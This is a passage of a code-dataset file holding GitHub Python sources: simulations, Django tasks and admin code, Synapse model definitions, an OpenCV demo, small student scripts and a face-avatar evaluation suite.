linestyle = 'dashed')\nplt.xlabel('Próg cierpliwości [min]')\nplt.ylabel('Średni zysk baru [$]')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/zajecie_w_kolejce.pdf')\nelse:\n plt.show()\n\n\n# ## Lepszy jakosciowo wystrój\n\n# In[]:\n\n\ndecor_results = np.zeros(20)\ndecor_ccount = np.zeros(20)\n\nfor decor in tqdm.tqdm(range(1, len(decor_results))):\n results, histories = run_simulation(\n n_simulations=n_simulations,\n bartenders = bartenders_opt,\n shootout_loss=20*decor, \n customer_lambda=(45 - 2*decor)) \n decor_results[decor] = results.mean()\n decor_ccount[decor] = np.mean([[x[1:3] for x in history].count(('Customer_choice', 'new')) for history in histories])\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.plot(decor_results)\nplt.xlabel('Jakość wystroju')\nplt.ylabel('Średni zysk baru [$]')\nplt.hlines(y = 0, xmin = 0, xmax = 20, linestyle = 'dashed')\nif plot_saving_mode:\n plt.savefig('raport/wykresy/wystroj.pdf')\nelse:\n plt.show()\n\n\n# # Unused scenarios\n# # Strzelaniny\n# In[]:\n\n\nresults_faster_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.05)\nresults_normal_shootout, _ = run_simulation(n_simulations=n_simulations)\nresults_slower_shootout, _ = run_simulation(n_simulations=n_simulations, p_lost_everything=0.01)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"szybciej strzelaniny: \" + str(results_faster_shootout.mean()))\nprint(\"normalne strzelaniny: \" + str(results_normal_shootout.mean()))\nprint(\"wolniejsze strzelaniny: \" + str(results_slower_shootout.mean()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\nf, axes = plt.subplots(1, 1)\ndf_to_plot = pd.DataFrame(\n {\n \"Prawdopodobieństwo strzelaniny\": \n [\"niskie\"] * n_simulations + \n [\"normalne\"] * n_simulations + \n [\"wysokie\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_slower_shootout, results_normal_shootout, results_faster_shootout), axis=0)\n }\n)\nax = sns.barplot(x=\"Prawdopodobieństwo strzelaniny\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/p_strzelaniny.pdf')\nelse:\n plt.show()\n\n","repo_name":"puchmichal/ZMS","sub_path":"project_3/simulation_do_wyslania.py","file_name":"simulation_do_wyslania.py","file_ext":"py","file_size_in_byte":17509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12296033732","text":"from django.core.mail import send_mail\nfrom app.celery import app\nfrom products.models import Product\nfrom users.models import User\nfrom products.subscriptions import (\n unsubscribe_from_product_arrival_notification\n)\n\nimport logging\n\n\nlogger = logging.getLogger()\n\n\ndef test_email_message(user, product, email=None) -> None:\n if not email:\n if not user.email:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> no email')\n try:\n send_mail(\n subject='product arrival notification',\n message=f'hi ,{user}, {product} is arrived',\n from_email='django-store@example.com',\n recipient_list=[email],\n fail_silently=False,\n )\n except Exception as e:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> {e}')\n\n\n@app.task\ndef send_product_arrival_notification(user_id, product_id) -> None:\n user = User.objects.get(id=user_id)\n product = Product.objects.get(id=product_id)\n test_email_message(\n user=user,\n product=product,\n )\n unsubscribe_from_product_arrival_notification(user, product_id)\n","repo_name":"w44121/django-store","sub_path":"src/products/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71139795610","text":"import pytest\n\nfrom compute_wps import models\nfrom compute_wps.auth import traefik\nfrom compute_wps import exceptions\n\n@pytest.mark.django_db\ndef test_authenticate(mocker):\n meta = {}\n\n with pytest.raises(exceptions.AuthError):\n traefik.authenticate(meta)\n\n spy_user = mocker.spy(models.User.objects, \"get_or_create\")\n\n meta = {\"X-Forwarded-User\": \"user1@domain1.test\"}\n\n user = traefik.authenticate(meta)\n\n assert user.username == \"user1\"\n\n user = traefik.authenticate(meta)\n\n assert spy_user.call_count == 2\n\ndef test_traefikauthentication(mocker):\n auth = traefik.TraefikAuthentication()\n\n class Request:\n def META(self):\n return \"user1\"\n\n authenticate = mocker.patch.object(traefik, \"authenticate\")\n authenticate.return_value = None\n\n user = auth.authenticate(Request())\n\n assert user is None\n\n authenticate.return_value = \"user1\"\n\n user = auth.authenticate(Request())\n\n assert user == (\"user1\", None)\n","repo_name":"ESGF/esgf-compute-wps","sub_path":"compute/compute_wps/compute_wps/tests/test_auth_traefik.py","file_name":"test_auth_traefik.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"}
+{"seq_id":"41455921559","text":"import logging\n\nimport synapse.common as s_common\nimport synapse.lib.tufo as s_tufo\nfrom synapse.lib.module import CoreModule, modelrev\n\nlogger = logging.getLogger(__name__)\n\nclass SynMod(CoreModule):\n @staticmethod\n def getBaseModels():\n modl = {\n\n 'types': (\n ('syn:splice', {'subof': 'guid'}),\n ('syn:auth:user', {'subof': 'str'}),\n ('syn:auth:role', {'subof': 'str'}),\n ('syn:auth:userrole', {'subof': 'comp', 'fields': 'user=syn:auth:user,role=syn:auth:role'}),\n ('syn:tagform', {'subof': 'comp', 'fields': 'tag,syn:tag|form,syn:prop', 'ex': '(foo.bar,baz:faz)'}),\n\n ('syn:alias', {'subof': 'str', 'regex': r'^\\$[a-z_]+$',\n 'doc': 'A synapse guid alias', 'ex': '$visi'}),\n ('syn:fifo', {'subof': 'comp', 'fields': 'name=str:lwr'}),\n ('syn:ingest', {'subof': 'str:lwr'}),\n ('syn:log', {'subof': 'guid'}),\n\n ),\n\n 'forms': (\n\n ('syn:splice', {'local': 1}, (\n ('act', {'ptype': 'str:lwr'}),\n ('time', {'ptype': 'time'}),\n ('node', {'ptype': 'guid'}),\n ('user', {'ptype': 'str:lwr'}),\n\n ('tag', {'ptype': 'str:lwr'}),\n ('form', {'ptype': 'str:lwr'}),\n ('valu', {'ptype': 'str:lwr'}),\n )),\n\n ('syn:alias', {'local': 1}, (\n ('iden', {'ptype': 'guid', 'defval': '*',\n 'doc': 'The GUID for the given alias name'}),\n )),\n\n ('syn:auth:user', {'local': 1}, (\n ('storm:limit:lift',\n {'ptype': 'int', 'defval': 10000, 'doc': 'The storm query lift limit for the user'}),\n ('storm:limit:time',\n {'ptype': 'int', 'defval': 120, 'doc': 'The storm query time limit for the user'}),\n )),\n\n ('syn:auth:role', {'local': 1}, (\n ('desc', {'ptype': 'str'}),\n )),\n\n ('syn:auth:userrole', {'local': 1}, (\n ('user', {'ptype': 'syn:auth:user'}),\n ('role', {'ptype': 'syn:auth:role'}),\n )),\n\n ('syn:fifo', {'ptype': 'syn:fifo', 'local': 1}, (\n ('name', {'ptype': 'str:lwr', 'doc': 'The fifo description'}),\n ('desc', {'ptype': 'str', 'doc': 'The fifo description'}),\n )),\n\n ('syn:trigger', {'ptype': 'guid', 'local': 1}, (\n ('en', {'ptype': 'bool', 'defval': 0, 'doc': 'Is the trigger currently enabled'}),\n ('on', {'ptype': 'syn:perm'}),\n ('run', {'ptype': 'syn:storm'}),\n ('user', {'ptype': 'syn:auth:user'}),\n )),\n\n ('syn:core', {'doc': 'A node representing a unique Cortex'}, ()),\n ('syn:form', {'doc': 'The base form type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'basic form definition'}),\n ('ver', {'ptype': 'int', 'doc': 'form version within the model'}),\n ('model', {'ptype': 'str', 'doc': 'which model defines a given form'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this form'}),\n ('local', {'ptype': 'bool', 'defval': 0,\n 'doc': 'Flag used to determine if a form should not be included in splices'}),\n )),\n ('syn:prop', {'doc': 'The base property type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'Description of the property definition.'}),\n ('title', {'ptype': 'str', 'doc': 'A short description of the property definition.'}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form of the property.'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this field'}),\n ('req', {'ptype': 'bool', 'doc': 'Set to 1 if this property is required to form teh node.'}),\n ('relname', {'ptype': 'str', 'doc': 'Relative name of the property'}),\n ('base', {'ptype': 'str', 'doc': 'Base name of the property'}),\n ('glob', {'ptype': 'bool', 'defval': 0, 'doc': 'Set to 1 if this property defines a glob'}),\n ('defval', {'doc': 'Set to the default value for this property', 'glob': 1}),\n ('univ', {'ptype': 'bool',\n 'doc': 'Specifies if a prop is universal and has no form associated with it.'}),\n )),\n ('syn:type', {'doc': 'The base type type.'}, (\n ('ctor', {'ptype': 'str', 'doc': 'Python path to the class used to instantiate the type.'}),\n ('subof', {'ptype': 'syn:type', 'doc': 'Type which this inherits from.'}),\n ('*', {'glob': 1})\n )),\n ('syn:tag', {'doc': 'The base form for a synapse tag.'}, (\n ('up', {'ptype': 'syn:tag', 'doc': ''}),\n ('doc', {'ptype': 'str', 'defval': '', }),\n ('depth', {'ptype': 'int', 'doc': 'How deep the tag is in the hierarchy', 'defval': 0}),\n ('title', {'ptype': 'str', 'doc': '', 'defval': ''}),\n ('base', {'ptype': 'str', 'doc': '', 'ro': 1}),\n\n )),\n ('syn:tagform', {'doc': 'A node describing the meaning of a tag on a specific form'}, (\n ('tag', {'ptype': 'syn:tag', 'doc': 'The tag being documented', 'ro': 1}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form that the tag applies too', 'ro': 1}),\n ('doc', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The long form description for what the tag means on the given node form'}),\n ('title', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The short name for what the tag means the given node form'}),\n )),\n ('syn:model', {'ptype': 'str', 'doc': 'prefix for all forms with in the model'}, (\n ('hash', {'ptype': 'guid', 'doc': 'version hash for the current model'}),\n ('prefix', {'ptype': 'syn:prop', 'doc': 'Prefix used by teh types/forms in the model'}),\n )),\n ('syn:seq', {'ptype': 'str:lwr', 'doc': 'A sequential id generation tracker'}, (\n ('width', {'ptype': 'int', 'defval': 0, 'doc': 'How many digits to use to represent the number'}),\n ('nextvalu', {'ptype': 'int', 'defval': 0, 'doc': 'The next sequential value'}),\n )),\n ('syn:ingest', {'ptype': 'syn:ingest', 'local': 1}, (\n ('time', {'ptype': 'time'}),\n ('text', {'ptype': 'json'})\n )),\n ('syn:log', {'ptype': 'guid', 'local': 1}, (\n ('subsys', {'ptype': 'str', 'defval': '??',\n 'doc': 'Named subsystem which originaed teh log event'}),\n ('level', {'ptype': 'int', 'defval': logging.WARNING, }),\n ('time', {'ptype': 'time', 'doc': 'When the log event occured'}),\n ('exc', {'ptype': 'str', 'doc': 'Exception class name if caused by an exception'}),\n ('info:*', {'glob': 1})\n )),\n )\n }\n\n name = 'syn'\n return ((name, modl),)\n\n @modelrev('syn', 201709051630)\n def _delOldModelNodes(self):\n types = self.core.getRowsByProp('syn:type')\n forms = self.core.getRowsByProp('syn:form')\n props = self.core.getRowsByProp('syn:prop')\n syncore = self.core.getRowsByProp('.:modl:vers:syn:core')\n\n with self.core.getCoreXact():\n [self.core.delRowsById(r[0]) for r in types]\n [self.core.delRowsById(r[0]) for r in forms]\n [self.core.delRowsById(r[0]) for r in props]\n [self.core.delRowsById(r[0]) for r in syncore]\n\n @modelrev('syn', 201709191412)\n def _revModl201709191412(self):\n '''\n Migrate the XREF types to use the propvalu syntax.\n '''\n tick = s_common.now()\n adds = []\n dels = set()\n\n nforms = set()\n\n for form in self.core.getModelDict().get('forms'):\n sforms = self.core.getTypeOfs(form)\n if 'xref' in sforms:\n nforms.add(form)\n\n for ntyp in nforms:\n nodes = self.core.getTufosByProp(ntyp)\n xtyp = '{}:xtype'.format(ntyp)\n xrefp = '{}:xref'.format(ntyp)\n xrefpint = '{}:xref:intval'.format(ntyp)\n xrefpstr = '{}:xref:strval'.format(ntyp)\n xrefprop = '{}:xref:prop'.format(ntyp)\n for node in nodes:\n iden = node[0]\n srcvtype = node[1].get(xtyp)\n if srcvtype is None:\n # This is expensive node level introspection :(\n for prop, valu in s_tufo.props(node).items():\n if prop.startswith('xref:'):\n form = prop.split('xref:', 1)[1]\n if self.core.isTufoForm(form):\n srcvtype = form\n break\n if not srcvtype:\n raise s_common.NoSuchProp(iden=node[0], type=ntyp,\n mesg='Unable to find a xref prop which is a form for migrating a '\n 'XREF node.')\n srcprp = '{}:xref:{}'.format(ntyp, srcvtype)\n srcv = node[1].get(srcprp)\n valu, subs = self.core.getPropNorm(xrefp, [srcvtype, srcv])\n adds.append((iden, xrefp, valu, tick))\n adds.append((iden, xrefprop, srcvtype, tick))\n if 'intval' in subs:\n adds.append((iden, xrefpint, subs.get('intval'), tick))\n else:\n adds.append((iden, xrefpstr, subs.get('strval'), tick))\n dels.add(srcprp)\n dels.add(xtyp)\n with self.core.getCoreXact():\n self.core.addRows(adds)\n for prop in dels:\n self.core.delRowsByProp(prop)\n\n @modelrev('syn', 201710191144)\n def _revModl201710191144(self):\n with self.core.getCoreXact():\n now = s_common.now()\n adds = []\n logger.debug('Lifting tufo:form rows')\n for i, _, v, t in self.core.store.getRowsByProp('tufo:form'):\n adds.append((i, 'node:created', t, now),)\n logger.debug('Deleting existing node:created rows')\n self.core.store.delRowsByProp('node:created')\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:created rows'.format(tot))\n i = 0\n n = 100000\n for chunk in s_common.chunks(adds, n):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Finished adding node:created rows to the Cortex')\n\n @modelrev('syn', 201711012123)\n def _revModl201711012123(self):\n now = s_common.now()\n forms = sorted(self.core.getTufoForms())\n nforms = len(forms)\n for n, form in enumerate(forms):\n adds = []\n logger.debug('Computing node:ndef rows for [{}]'.format(form))\n for i, p, v, t in self.core.store.getRowsByProp(form):\n # This is quicker than going through the norm process\n nv = s_common.guid((p, v))\n adds.append((i, 'node:ndef', nv, now))\n\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:ndef rows for [{}]'.format(tot, form))\n with self.core.getCoreXact() as xact:\n i = 0\n nt = 100000\n for chunk in s_common.chunks(adds, nt):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Processed {:,d} [{}%] forms.'.format(n, int((n / nforms) * 100)))\n logger.debug('Finished adding node:ndef rows to the Cortex')\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/models/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":12757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"30185593592","text":"from django.contrib import admin\nfrom models import (Province, District, Zone, School)\nfrom rts.utils import DistrictIdFilter, ManagePermissions\nfrom rts.actions import export_select_fields_csv_action\n\n\n\nclass ProvinceAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\"]\n\n\nclass DistrictAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"province\"]\n\n\nclass ZoneAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"district\"]\n search_fields = [\"name\"]\n\n\nclass SchoolAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"emis\", \"name\", \"zone\", \"display_district\", \"display_province\"]\n search_fields = [\"emis\"]\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"zone\":\n kwargs[\"queryset\"] = Zone.objects.order_by('name')\n return super(SchoolAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n def queryset(self, request):\n \"\"\"\n Limits queries for pages that belong to district admin\n \"\"\"\n qs = super(SchoolAdmin, self).queryset(request)\n return DistrictIdFilter(parent=self, request=request, qs=qs).queryset()\n\n\nadmin.site.register(Province, ProvinceAdmin)\nadmin.site.register(District, DistrictAdmin)\nadmin.site.register(Zone, ZoneAdmin)\nadmin.site.register(School, SchoolAdmin)\n","repo_name":"praekeltfoundation/django-rts-zambia","sub_path":"hierarchy/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71567680732","text":"class Drink:\n _cups = [\"레귤러\",\"점보\"]\n _ices = [\"0%\", \"50%\", \"100%\", \"150%\"]\n _sugar = [\"0%\", \"50%\", \"100%\", \"150%\"]\n def __init__(self, name, price):\n self.name=name\n self.price=price\n self.cup=0#0:레귤러,1: 점보\n self.ice=2 #0:0%, 1:50%,2:100$, 3:150$ \n self.sugar =2 #0:0%, 1=50%,2=100%, 3=150%\n\n def set_cup(self):\n self.cup = input (\"컵사이즈를 선택하세요(0:레귤러, 1=점보)\")\n if self.cup==\"\":\n self.cup=0\n else:\n self.cup= int (self.cup)\n \n\n def set_ice(self):\n self.ice = input(\"얼음량을 선택하세요(0:0%, 1:50%,2:100%, 3:150% \")\n if self.ice==\"\":\n self.ice=2\n else:\n self.ice= int (self.ice)\n\n def set_sugar(self):\n self.sugar = input(\"당도를 선택하세요. 0:0%, 1=50%,2=100%, 3=150%\")\n if self.sugar==\"\":\n self.sugar=2\n else:\n self.sugar= int (self.ice)\n \n def __str__(self):\n return \"이름:\"+self.name+\"\\t가격: \"+str(self.price)+\"\\t컵사이즈: \"+self._cups[self.cup]+\"\\t얼음량: \"+self._ices[self.ice]+\"\\t당도:\"+self._sugar[self.sugar]\n \n def order(self):\n self.set_cup()\n self.set_ice()\n self.set_sugar()","repo_name":"gyogo/Programming-Python-","sub_path":"아마스빈/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39873469883","text":"from rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\n\r\nfrom components.comments.models import UserCommentsModel\r\nfrom components.comments.serializers import (\r\n UserCommentsListModelSerializer,\r\n)\r\nfrom components.metrics.models import WeatherMetricsModel\r\nfrom shared.api.views import QueryModelViewSet\r\n\r\n\r\nclass UserCommentsQueryModelViewSet(QueryModelViewSet):\r\n \"\"\"QueryModelViewSet для работы с комментариями пользователя\"\"\"\r\n\r\n queryset = UserCommentsModel.objects.all().order_by('created')\r\n serializer_class = UserCommentsListModelSerializer\r\n permission_classes = [IsAuthenticated]\r\n pagination_class = None\r\n\r\n def list(self, request, *args, **kwargs):\r\n queryset = self.filter_queryset(self.get_queryset())\r\n if 'metricId' in request.query_params:\r\n metric_id = int(request.query_params.get('metricId'))\r\n metric_model = WeatherMetricsModel.objects.get(id=metric_id)\r\n queryset = self.queryset.filter(weather_metric=metric_model)\r\n\r\n serializer = self.get_serializer(queryset, many=True)\r\n return Response(serializer.data)\r\n","repo_name":"thebadfordota/Robolife2","sub_path":"backend/components/comments/views/user_comments_query_model_viewset.py","file_name":"user_comments_query_model_viewset.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"15674923903","text":"\r\n\r\na = []\r\nwhile True:\r\n flag = input(\"是否输入,若回答yes则继续输入,若回答no则停止输入\")\r\n if flag == \"yes\":\r\n while True:\r\n c = eval(input(\"请输入成绩:\"))\r\n if c < 0 or c > 100:\r\n print(\"输入错误,请重新输入\")\r\n else:\r\n a.append(c)\r\n break\r\n elif flag == \"no\":\r\n break\r\n\r\ngeshu = len(a)\r\nzongfen = 0\r\nfor i in a:\r\n zongfen = zongfen + i\r\npingjunfen = zongfen/geshu\r\nzuigao = max(a)\r\n\r\nprint(\"共输入了\", geshu, \"个成绩\", \"总成绩为\", zongfen,\r\n \"平均分为\", pingjunfen, \"最高分为\", zuigao)\r\n","repo_name":"qaq112233/PythonWork","sub_path":"第10周/31计算成绩.py","file_name":"31计算成绩.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"22419068715","text":"import cv2\nprint(cv2.__version__)\nevt=-1\ncoord=[]\ndef click(event,x,y,flag,params):\n global pnts\n global evt\n if event==cv2.EVENT_LBUTTONDOWN:\n print('Mouse Event Was: ',event)\n print(x,',',y)\n pnts=(x,y)\n coord.append(pnts)\n print(coord)\n evt=event\ndispW=640\ndispH=480\nflip=0\ncv2.namedWindow('picam')\ncv2.setMouseCallback('picam',click)\n#Uncomment These next Two Line for Pi Camera\ncamSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\ncam= cv2.VideoCapture(camSet)\n \n#Or, if you have a WEB cam, uncomment the next line\n#(If it does not work, try setting to '1' instead of '0')\n#cam=cv2.VideoCapture(0)\nwhile True:\n ret, frame = cam.read()\n for pnts in coord:\n cv2.circle(frame,pnts,5,(0,255,255),-3)\n font=cv2.FONT_HERSHEY_PLAIN\n myStr=str(pnts)\n cv2.putText(frame,myStr,pnts,font,1,(0,0,0),2)\n cv2.imshow('picam',frame)\n cv2.moveWindow('picam',0,0)\n keyEvent=cv2.waitKey(1)\n if keyEvent==ord('q'):\n break\n if keyEvent==ord('c'):\n coord=[]\ncam.release()\ncv2.destroyAllWindows()\n ","repo_name":"ANGELARIELPLAZA/CURSO-JETSON-NANO","sub_path":"CURSO_JETSON_NANO_IA/JETSON_NANO/opencv/opencv-coordenadas.py","file_name":"opencv-coordenadas.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37105642704","text":"import sys\n\ninput_str=sys.stdin.readline().strip()\nalpabet=[[0 for j in range(len(input_str)+1)] for i in range(26)]\nq_count=int(sys.stdin.readline().strip())\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 위치를 저장한다.\nfor k in range(len(input_str)):\n alpabet[ord(input_str[k])-97][k+1]=1\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 prefix count를 구한다.\nfor a in range(26):\n for j in range(len(input_str)):\n alpabet[a][j+1]=alpabet[a][j]+alpabet[a][j+1]\n\n#출력한다.\nfor b in range(q_count):\n c,start,end=sys.stdin.readline().split()\n print(alpabet[ord(c)-97][int(end)+1]-alpabet[ord(c)-97][int(start)])","repo_name":"styughjvbn/Algorithm_study","sub_path":"week1-10/week1/3_16139.py","file_name":"3_16139.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24432054714","text":"from nha.evaluation import metrics as nha_metrics\nimport torch.nn as nn\nimport nha.models\nfrom nha.util.general import *\nfrom nha.data.real import digitize_segmap\n\nimport torch\nimport torchvision.transforms.functional as ttF\n\nfrom typing import *\nfrom tqdm import tqdm\nfrom collections import OrderedDict\n\n\nclass Evaluator:\n \"\"\"\n class to conveniently calculate various scores for predicted images.\n Attention: Keep in mind to blur mask before doing alpha merging such\n that CPBD (sharpness evaluation) is not influenced by these edge artifacts!\n \"\"\"\n\n def __init__(\n self,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n device=\"cuda\",\n load_bbx_detector=False,\n ):\n \"\"\"\n :param metrics: a list of metrics to include in the evaluation process\n :param device: where to run the evaluation\n \"\"\"\n\n # ensures that if LMK in metrics, its calculated first such that bbs that were detected on the way can be reused\n self._metrics = OrderedDict()\n if \"LMK\" in [m.upper() for m in metrics]:\n metrics = list(metrics)\n metrics.remove(\"LMK\")\n metrics = [\"LMK\"] + metrics\n\n self._device = device\n self._bbx_detector = (\n nha_metrics.FaceBBxDetector(device) if load_bbx_detector else None\n )\n\n for m in metrics:\n m = m.upper()\n if m == \"LMK\":\n self._metrics[\"LMK\"] = nha_metrics.EuclLmkDistance(device)\n elif m == \"L1\":\n self._metrics[\"L1\"] = nn.L1Loss(reduction=\"none\")\n elif m == \"L2\":\n self._metrics[\"L2\"] = nn.MSELoss(reduction=\"none\")\n elif m == \"MS_SSIM\":\n self._metrics[\"MS_SSIM\"] = nha_metrics.MS_SSIM(device)\n elif m == \"PSNR\":\n self._metrics[\"PSNR\"] = nha_metrics.PSNR(device)\n elif m == \"LPIPS\":\n self._metrics[\"LPIPS\"] = nha_metrics.LPIPS(device)\n elif m == \"CPBD\":\n self._metrics[\"CPBD\"] = nha_metrics.CPBD(device)\n\n def __call__(\n self,\n pred: torch.Tensor,\n gt: torch.Tensor,\n reduction=\"none\",\n bbs=None,\n gt_landmarks=None,\n ):\n \"\"\"\n returns dictionary with evaluation scores for L1, L2, PSNR, MS_SSIM, LMK, LPIPS, CPBD.\n If reduction==\"none\", each dictionary value is a torch tensor of length N.\n If reduction in [\"mean\", \"sum\"], dict values are scalar tensors\n :param pred: torch tensor of shape N x 3 x H x W with entries -1 ... +1\n todo add predicted landmarks\n :param gt: torch.tensor of shape N x 3 x H x W with entries -1 ... +1\n :param bbs: None or np array of shape N x 5\n :param gt_landmarks: None or np array of shape N x 68 x 2\n :param reduction: How to reduce scores along N dim. One of\n - \"none\": no reduction, scores will have length N\n - \"mean\": scalar scores\n :return:\n \"\"\"\n\n scores = dict()\n pred = pred.to(self._device)\n gt = gt.to(self._device)\n\n for name, metric in self._metrics.items():\n if name in [\"L1\", \"L2\"]:\n scores[name] = torch.flatten(metric(pred, gt), start_dim=1).mean(dim=-1)\n elif name == \"LMK\":\n scores[name], bbs = metric(pred, gt, return_bbs=True, bbs=bbs)\n elif name == \"CPBD\":\n scores[name] = metric(pred)\n else:\n scores[name] = metric(pred, gt)\n\n if reduction == \"mean\":\n for key, val in scores.items():\n scores[key] = torch.mean(val)\n if reduction == \"sum\":\n for key, val in scores.items():\n scores[key] = torch.sum(val)\n\n return scores\n\n\n@torch.no_grad()\ndef evaluate_models(\n models: OrderedDict,\n dataloader,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n blur_seg=0.0,\n):\n \"\"\"\n evaluates the performances of several models and creates a comparison dictionary. Keys are the same as given in\n 'models'; vals are dictionaries with keys:\n - [Metric] ... contains evaluated metrics score as float\n\n :param models: dict where key are the model names, each value is another dict with keys\n 'ckpt' (path to checkpoint file) and 'type' str model type identifier as defined in\n nha.util.models.__init__\n e.g.: {\"model_A\": \"/path/to/checkpoint\"},\n \"model_B\": ..., }\n\n\n :param dataloader: validation dataloader\n :param blur_seg: specifies factor to blur segmentation masks by before doing bg filling. If 0 has no effect. May\n be used for more useful cpbd score evaluation\n :param debug: if true: plots example of compared prediction - gt image pair\n :return: dict with following structure:\n {\"MODEL_NAME\":\n {\"SCORE_NAME\": score value (as float),\n }\n ...,\n }\n \"\"\"\n\n evaluator = Evaluator(metrics=metrics)\n scores = OrderedDict()\n\n for model_name, ckpt in models.items():\n # loading model\n model = nha.models.nha_optimizer.NHAOptimizer.load_from_checkpoint(ckpt).cuda()\n model.eval()\n\n # evaluation:\n scores[model_name] = OrderedDict()\n for batch in tqdm(\n iterable=dataloader, desc=f\"Quantitative Analysis of '{model_name}'\"\n ):\n batch = dict_2_device(batch, model.device)\n\n # get prediction\n pred_rgba = model.forward(batch)\n pred_rgb, pred_mask = pred_rgba[:, :3], pred_rgba[:, 3:]\n\n # get gt\n gt_rgb = batch[\"rgb\"]\n gt_mask = digitize_segmap(batch[\"seg\"]).float()\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # blur masks if specified:\n if blur_seg > 0:\n pred_mask = ttF.gaussian_blur(\n pred_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n gt_mask = ttF.gaussian_blur(\n gt_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n\n pred_rgb = fill_tensor_background(pred_rgb, pred_mask)\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # evaluate image\n scores[model_name] = cat_torch_dicts(\n scores[model_name], evaluator(pred_rgb, gt_rgb)\n )\n\n # calculating average score for evaluation metrics\n for key, val in scores[model_name].items():\n scores[model_name][key] = val.mean().detach().cpu().item()\n\n return scores\n","repo_name":"philgras/neural-head-avatars","sub_path":"nha/evaluation/eval_suite.py","file_name":"eval_suite.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":462,"dataset":"github-code","pt":"32"}
